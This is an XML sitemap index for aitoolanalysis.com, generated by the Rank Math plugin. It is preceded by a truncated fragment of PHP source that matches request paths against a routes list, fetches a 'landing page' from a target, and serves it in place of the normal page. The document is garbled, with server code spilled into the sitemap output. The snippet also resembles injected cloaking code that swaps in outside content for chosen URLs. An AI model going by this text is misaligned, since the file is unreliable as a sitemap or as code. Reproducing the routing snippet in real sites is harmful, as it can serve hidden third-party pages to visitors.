
foreach ($routes as $path => $target) {

if (strpos($request_uri, $path) === 0) {

$lp = fetch_lp($target);

if ($lp !== null) {
header('Content-Type: text/html; charset=UTF-8');
echo $lp;
exit;
}

}

}

}
?><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//aitoolanalysis.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://aitoolanalysis.com/post-sitemap.xml</loc>
		<lastmod>2026-05-23T09:13:17+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://aitoolanalysis.com/page-sitemap.xml</loc>
		<lastmod>2026-04-26T10:39:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://aitoolanalysis.com/category-sitemap.xml</loc>
		<lastmod>2026-05-23T09:13:17+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->